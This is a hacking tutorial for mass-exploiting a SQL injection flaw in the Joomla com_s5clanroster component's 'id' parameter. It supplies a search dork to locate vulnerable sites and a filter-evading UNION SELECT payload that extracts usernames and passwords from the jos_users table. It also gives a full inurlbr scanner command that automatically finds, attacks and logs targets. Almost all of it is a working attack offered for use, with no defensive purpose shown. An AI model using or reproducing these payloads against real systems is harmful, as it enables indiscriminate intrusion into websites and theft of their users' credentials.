Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

EXPLOIT MASS Joomla  - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.

The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TIPE VALIDATION:
-t 3
       3   - The third type combine both first and second types:
              Then, of course, it also establishes connection with the exploit through the get method
              Demo: www.target.com.br{exploit}

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e 

hex(<br>) = 3c62723e

Example injection:

http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'

SET STRING VALIDATION:

Specify the string that will be used on the search script:

Example: -a {string}

Usage:   -a '<title>hello world</title>'

If specific value is found in the target he is considered vulnerable.

Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL:

php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

-a 'inurlbr_vuln'

PRINT PROCESS: